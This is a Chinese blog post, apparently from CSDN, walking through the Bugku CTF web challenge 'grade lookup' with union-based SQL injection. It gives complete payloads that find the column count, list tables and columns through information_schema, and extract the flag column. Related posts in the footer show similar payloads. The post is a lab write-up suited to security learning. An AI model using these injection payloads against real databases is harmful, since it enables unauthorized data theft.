ctf-web-成绩查询

最新推荐文章于 2024-04-26 21:09:14 发布
最新推荐文章于 2024-04-26 21:09:14 发布
阅读量1.1k 收藏 4
点赞数 3
分类专栏: ctf 文章标签: 网络安全 前端 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124138219
版权

题目:

打开网页:

 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时:

 查看源代码:

 发现,表单使用post方式提交,并且name="id"

猜测使用SQL注入

首先检测闭合方式:

        分别post id=1' id=1"

        发现post id=1"时,正常,post id=1'时无响应

        应该是单引号 ' ' 闭合

再通过order by查询当前表列数:

        

        于是可以判断出当前表具有4列

查询显示位置:

        使用union select查询每一列数据显示位置

 判断当前数据库包含的表名:

        post

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

 查询表fl4g里的列名:

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

 查询列表fl4g对应skctf_flag列的数据:

id=-1' union select 1,2,3,skctf_flag from fl4g#

 得到结果

这里注意使用union select注入时,id不能是存在的数值,因为程序在展示数据的时候通常只会取结果集的第一行数据,如果是已存在的数值,则想要的数据不会存于第一行,就无法显示

榴莲 蛋挞
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfquery:CTF数据查询命令行工具
05-19
ctfquery 查询CTF以获取特定信息。 用法 ctfquery [ -s SYM | -t TYPE_ID | -c TYPE_ID | -l LABEL | -v | -h ] <file> -s SYM搜索名为SYM的符号 -S TYPE_ID搜索类型为TYPE_ID所有符号 -t TYPE_ID搜索以TYPE_ID标识的类型 -c TYPE_ID用头顶用TYPE_ID标识的-c TYPE_ID解决typedef链 -l LABEL搜索名称为LABEL -v打印文件的CTF版本 -h打印帮助消息 建造 $ ninja 依存关系 例子 ...或最大进程ID的故事 握住我的手,我们要去旅行! 说,由于某种原因,我们完全了解内核符号pid_max ,该符号表示系统上的最大PID。 当然,一种方法是调查源,但是如果它不可用,而我们陷入一些随机的黑匣子故障转储中,该怎么办? ctf
Bugku Web CTF-学生成绩查询
No Title
12-16 1195
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
CTF——web安全(六)
最新发布
qq_45215609的博客
04-26 354
CTF——web安全(六) 题目一:成绩查询
Web学习之路(BUUCTF刷题之旅4)
AKAXPD的博客
02-10 2064
一、[BJDCTF2020]Easy MD5 打开后只有一个提交查询的界面,在源代码里没有找到任何东西。
BUUCTF WEB [GXYCTF2019]BabySQli
Y1da的博客
04-18 746
BUUCTF WEB [GXYCTF2019]BabySQli 手工注入 这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据 假设联合查询前表结构如下 id name password 1 tom 123456 此时执行联合查询 select * from 'users' where name='admin' union select 2,'admin','123'; 表结构将会变成 id name password 1
CTFshow web入门之信息收集(web1-web20)
小白的博客
05-10 675
得到一个IP地址或网址时第一步:查看源码第二步:网页上查找是否有有效信息第三步:查看是否存在说明文件rotobs.txt第四步:通过御剑或dirsearch扫描探测是否存在其它页面第五步:按照网页的框架信息查看是否存在测试文件或备份文件。
SQLi-CTF-master.zip
04-09
SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全漏洞,主要出现在使用了不安全的SQL语句构建的应用程序中。...通过学习和实践,可以提升对网络安全的理解,并在CTF比赛中取得更好的成绩
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的...通过分析代码、模拟攻击、调试程序等方式,参赛者可以不断提升自己的安全技能,并在比赛中取得好成绩
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web题型是常见的比赛环节,主要测试参赛者在Web安全领域的知识和技能。本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个...
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
【知识点详解】 本文主要涉及的是CTF(Capture The Flag)安全大赛的相关知识,这是一种网络安全竞赛,参赛者通过解决各种安全问题来...参赛者需要不断学习和实践,掌握各种解题技巧和工具,以便在比赛中取得好成绩
007-CTF web题型总结-第七课 CTF WEB实战练习(三).pdf
07-09
007-CTF Web题型总结的第七课主要涵盖了三个部分:入门第一部分、入门第二部分-社工篇和入门第三部分-高级篇。这些部分详细介绍了在CTF...在学习和实践中,不断深化对Web安全的理解,有助于在CTF竞赛中取得优异成绩
ctf刷题笔记之sql注入-union注入|bugku CTF成绩查询
weixin_51614848的博客
08-18 1292
ctf刷题笔记
CTF 简单sql
明月于心的博客
07-25 1233
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
[WUSTCTF2020]颜值成绩查询
Yb_140的博客
11-03 141
sql盲注
CTF-web】bugku-成绩查询sql注入)
Sankkl1的博客
08-17 580
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3220
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
CTF小技巧
zh_cn1的博客
08-15 116
grep "flag" -r test/ cat xxx/xxx.raw strings xxx/xxx.raw
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 766
[WUSTCTF2020]颜值成绩查询(布尔注入)
bugku ctf 成绩单 (类似sql注入)
qq_42777804的博客
08-15 1020
原始界面    与以往的sql注入不同,直接在成绩查询栏中 注入     随便输入数字 发现居然会出现显示位 之后猜测应该有3个以上的显示位,因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应 那么就四个 ?id=1' union select 1,2,3,4#     发现了4个 ,那我们就用最后一个   先...
ctf web 思维导图
12-18
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web领域涉及到了网页应用程序的漏洞挖掘和利用。...掌握这些知识和技能能够帮助参赛者更好地分析和利用Web漏洞,从而在CTF比赛中取得优异的成绩

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值